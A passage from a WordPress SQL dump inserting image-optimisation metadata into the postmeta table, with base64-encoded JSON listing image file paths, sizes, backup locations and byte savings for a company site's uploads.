iZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0MzAsInRpbWUiOjE0ODM1ODIxMzIsImlkIjo3NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMDQwLCJ0aW1lIjoxNDgzNTgyMTM2LCJpZCI6NzY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MDcsInRpbWUiOjE0ODM1ODIxMzksImlkIjo3NjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ0MCwidGltZSI6MTQ4MzU4MjE0MiwiaWQiOjc2Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDgwLCJ0aW1lIjoxNDgzNTgyMTQ2LCJpZCI6NzY2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo0OTEsInRpbWUiOjE0ODM1ODIxNDksImlkIjo3NjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjU5NiwidGltZSI6MTQ4MzU4MjE1MywiaWQiOjc2Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (29999, 765, 'wpfc_optimisation_reduction', '2711076'); 
INSERT INTO `wp_postmeta` VALUES (30000, 765, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDkuanBnIiwid2lkdGgiOjQyNTYsImhlaWdodCI6MjgzMiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDkuanBnIiwicmVkdWN0aW9uIjoyNzExMDYzLCJ0aW1lIjoxNDgzNTgyMTY0LCJpZCI6Ijc2NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMTY3LCJpZCI6NzY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktODAweDUzMi5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTgwMHg1MzIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MjE3MCwiaWQiOjc2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS03Njh4NTExLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODIxNzMsImlkIjo3NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0xNjAweDEwNjUuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTE2MDB4MTA2NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODIxNzcsImlkIjo3NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMTc5LCJpZCI6NzY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MjE4MiwiaWQiOjc2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODIxODQsImlkIjo3NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMTg3LCJpZCI6NzY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMTkwLCJpZCI6NzY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMTkyLCJpZCI6NzY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMTk1LCJpZCI6NzY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMTk3LCJpZCI6NzY1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM3NjU1ODU0OS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNzY1NTg1NDktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzc2NTU4NTQ5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyMjAwLCJpZCI6NzY1fV0='); 
INSERT INTO `wp_postmeta` VALUES (30001, 764, 'wpfc_optimisation_reduction', '14463'); 
INSERT INTO `wp_postmeta` VALUES (30002, 764, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQuanBnIiwid2lkdGgiOjQ5MjgsImhlaWdodCI6MzI2NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MjIwNSwiaWQiOiI3NjQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6Njk3LCJ0aW1lIjoxNDgzNTgyMjA4LCJpZCI6NzY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtODAweDUzMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTgwMHg1MzAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC04MDB4NTMwLmpwZyIsInJlZHVjdGlvbiI6MTYyOCwidGltZSI6MTQ4MzU4MjIxMiwiaWQiOjc2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTc2OHg1MDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC03Njh4NTA5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDQ2MDM3MjQtNzY4eDUwOS5qcGciLCJyZWR1Y3Rpb24iOjE0MDcsInRpbWUiOjE0ODM1ODIyMTcsImlkIjo3NjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNDYwMzcyNC0xNjAweDEwNjAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTE2MDB4MTA2MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA0NjAzNzI0LTE2MDB4MTA2MC5qcGciLCJyZWR1Y3Rpb24iOjQ5